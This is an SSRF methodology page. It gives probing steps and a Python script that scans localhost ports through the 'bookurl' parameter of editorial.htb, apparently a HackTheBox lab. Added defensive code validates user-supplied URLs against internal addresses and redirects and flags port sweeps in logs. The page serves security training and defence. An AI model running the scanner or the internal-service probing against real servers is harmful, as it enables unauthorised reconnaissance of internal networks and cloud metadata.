SSRF
Server Side Request Forgery
Methodology
Watch for any unexpected redirects, especially to internal or private IP addresses. These can often indicate a vulnerable SSRF endpoint.
Use a listener to see if the server is initiating outbound connections. This helps confirm whether the server is making requests to external resources.
Pay special attention to which ports are open on the localhost, as they might indicate internal services that can be targeted.
If you discover that there are open ports on internal services, try querying them via the vulnerable parameter. This could reveal sensitive information, such as metadata, headers, or responses that were not intended to be exposed.
If the SSRF vulnerability exposes endpoints, like internal APIs, try querying those endpoints from the vulnerable parameter.
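From the defending side, the points above (redirects to internal addresses, requests reaching localhost ports and the cloud metadata endpoint) map directly onto what a server-side fetch must refuse. The following is an added example, not code from the original page: a guard for a user-supplied URL parameter such as the "bookurl" field used later on this page. It rejects non-HTTP schemes, embedded credentials and any host that resolves to loopback, private, link-local, multicast, reserved or unspecified space, and it re-runs that check on every redirect hop instead of letting the HTTP client follow redirects on its own. The function names (check_url, fetch_checked, fake_fetch), the hop limit and the offline fake_fetch responses are all assumptions made for this example.

```python
import ipaddress
import socket
from urllib.parse import urlparse, urljoin

ALLOWED_SCHEMES = {"http", "https"}
MAX_HOPS = 3  # assumed limit on redirect hops a server-side fetch will follow


def is_internal(ip):
    """True for any address a server-side fetch should never reach: loopback,
    RFC 1918 / ULA private space, link-local (which covers the 169.254.169.254
    cloud metadata endpoint), multicast, reserved and unspecified ranges."""
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def resolve_all(host):
    """Every address the host maps to; IP literals map to themselves."""
    try:
        return [ipaddress.ip_address(host)]
    except ValueError:
        pass
    return [ipaddress.ip_address(info[4][0]) for info in socket.getaddrinfo(host, None)]


def check_url(url):
    """Return (ok, reason); ok is False when the URL must not be fetched server-side."""
    parsed = urlparse(url)
    if parsed.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parsed.scheme!r}"
    if not parsed.hostname:
        return False, "missing host"
    if parsed.username or parsed.password:
        return False, "credentials embedded in URL"
    try:
        addrs = resolve_all(parsed.hostname)
    except socket.gaierror:
        return False, "unresolvable host"
    for ip in addrs:
        if is_internal(ip):
            return False, f"internal address: {ip}"
    return True, "ok"


def fetch_checked(url, fetch_once, max_hops=MAX_HOPS):
    """Fetch url through a caller-supplied single-request function and re-check
    every redirect hop, so a public host cannot bounce the server onto an
    internal one. fetch_once(url) must return (status, headers, body) and must
    NOT follow redirects itself. Returns (ok, detail)."""
    for _ in range(max_hops + 1):
        ok, reason = check_url(url)
        if not ok:
            return False, reason
        status, headers, body = fetch_once(url)
        if status in (301, 302, 303, 307, 308):
            location = headers.get("Location")
            if not location:
                return False, "redirect without Location"
            url = urljoin(url, location)  # a relative Location resolves against the current URL
            continue
        return True, body
    return False, "too many redirects"


def fake_fetch(url):
    """Offline stand-in for a real HTTP client (constructed for this example):
    one path on a public host redirects to a loopback address."""
    if url == "http://8.8.8.8/go":
        return 302, {"Location": "http://127.0.0.1:6379/"}, b""
    if url == "http://8.8.8.8/rel":
        return 302, {"Location": "/final"}, b""
    return 200, {}, b"body"


if __name__ == "__main__":
    for candidate in ("http://127.0.0.1:8080/", "http://[::1]/", "file:///etc/passwd",
                      "http://169.254.169.254/latest/meta-data/", "http://8.8.8.8/"):
        print(candidate, "->", check_url(candidate))
    print("redirect to loopback ->", fetch_checked("http://8.8.8.8/go", fake_fetch))
    print("relative redirect    ->", fetch_checked("http://8.8.8.8/rel", fake_fetch))
```

The resolution step matters more than the string checks: a blocklist of literal strings like "127.0.0.1" is bypassed by a hostname that resolves to it, while a resolved-address check is not. The remaining gap is DNS rebinding (the name resolving to a public address at check time and an internal one at connect time); closing it requires the HTTP client to connect to the address that was checked, which is beyond this sketch.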
Port Scanner
Use this script to enumerate open ports on the localhost:
#!/usr/bin/python3
import requests

# The upload endpoint requires a file field, so create an empty file to send alongside the URL
with open("a", 'wb') as f:
    f.write(b'')

for port in range(1, 65536):  # ports 1..65535 inclusive
    with open("a", 'rb') as file:
        data_post = {"bookurl": f"http://127.0.0.1:{port}"}  # Vulnerable parameter
        data_file = {"bookfile": file}  # Mandatory parameter
        try:
            r = requests.post("http://editorial.htb/upload-cover", files=data_file, data=data_post)  # Vulnerable URL
            if not r.text.strip().endswith('.jpeg'):  # Only print responses that differ from the default (which ends in .jpeg)
                print(f"{port} --- {r.text}")
        except requests.RequestException as e:
            print(f"Error on port {port}: {e}")
Modify the parameters for your use case.
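A scan like the one above leaves a distinctive trace on the server: one client causing many server-side fetches to loopback addresses with incrementing ports. The following is an added example, not part of the original page, of detection logic that runs over application log lines. The log format (one line per server-side fetch, recording the client and the target URL), the sample lines and the threshold are all constructed for this example; real applications record this differently and would need the regex adapted.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlparse

# Assumed application log format (constructed for this example): one line per
# server-side fetch the application performs on behalf of a client.
LINE_RE = re.compile(r'^(?P<ts>\S+) client=(?P<client>\S+) fetch=(?P<url>\S+)$')

# Constructed sample lines: one client walking localhost ports through the
# fetch parameter, another fetching a normal cover and then the metadata endpoint.
SAMPLE_LOG = """\
2024-01-01T10:00:01Z client=203.0.113.7 fetch=http://127.0.0.1:21/
2024-01-01T10:00:01Z client=203.0.113.7 fetch=http://127.0.0.1:22/
2024-01-01T10:00:02Z client=203.0.113.7 fetch=http://127.0.0.1:23/
2024-01-01T10:00:02Z client=203.0.113.7 fetch=http://127.0.0.1:25/
2024-01-01T10:00:03Z client=203.0.113.7 fetch=http://127.0.0.1:80/
2024-01-01T10:00:03Z client=203.0.113.7 fetch=http://127.0.0.1:5000/
2024-01-01T10:00:05Z client=198.51.100.9 fetch=http://covers.example.org/a.jpeg
2024-01-01T10:00:06Z client=198.51.100.9 fetch=http://169.254.169.254/latest/meta-data/
"""


def target_is_internal(url):
    """True when the fetched host is a loopback, private or link-local literal,
    or the bare name 'localhost'. Non-literal hostnames would need resolving
    to be judged properly; this detector only flags the obvious cases."""
    host = urlparse(url).hostname
    if not host:
        return False
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host == "localhost"
    return ip.is_loopback or ip.is_private or ip.is_link_local


def analyse(log_text, scan_threshold=5):
    """Return {client: {"internal_fetches": n, "port_scan": bool}} for every
    client whose fetches reached an internal target. port_scan is set when the
    client touched at least scan_threshold distinct internal host:port pairs.
    Time windowing is omitted here; a production rule would bucket by time."""
    internal = defaultdict(list)
    targets = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparsable line, skipped
        url = m["url"]
        if target_is_internal(url):
            p = urlparse(url)
            internal[m["client"]].append(url)
            targets[m["client"]].add((p.hostname, p.port))
    return {
        client: {
            "internal_fetches": len(urls),
            "port_scan": len(targets[client]) >= scan_threshold,
        }
        for client, urls in internal.items()
    }


if __name__ == "__main__":
    for client, finding in analyse(SAMPLE_LOG).items():
        print(client, finding)
```

Any internal-target fetch at all is worth an alert on its own; the distinct-port count separates a single curious probe from a systematic sweep of the kind the script above performs.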